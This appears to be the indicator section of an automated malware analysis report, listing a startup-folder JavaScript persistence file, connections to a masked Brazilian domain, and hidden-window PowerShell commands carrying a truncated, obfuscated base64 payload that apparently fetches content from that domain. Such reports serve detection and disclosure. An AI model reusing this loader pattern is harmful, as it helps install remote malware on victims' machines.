Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\jzhnqçzfjwp.js
- 'up#####eimagens.com.br':443
- 'up#####eimagens.com.br':443
- DNS ASK up#####eimagens.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'J░░░Bp░░░G0░░░YQBn░░░GU░░░VQBy░░░Gw░░░I░░░░░░9░░░C░░░░░░JwBo░░░HQ░░░d░░░Bw░░░HM░░░Og░░░v░░░C8░░░dQBw░░░Gw░░░bwBh░░░GQ░░░Z░░░Bl░░░Gk░░░bQBh░░░Gc░░░ZQBu░░░HM░░░LgBj░░░G8░░░bQ...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'J░░░Bp░░░G0░░░YQBn░░░GU░░░VQBy░░░Gw░░░I░░░░░░9░░░C░░░░░░JwBo░░░HQ░░░d░░░Bw░░░HM░░░Og░░░v░░░C8░░░dQBw░░░Gw░░░bwBh░░░GQ░░░Z░░░Bl░░░Gk░░░bQBh░░░Gc░░░ZQBu░░░HM░░░LgBj░░░G8░░░bQ...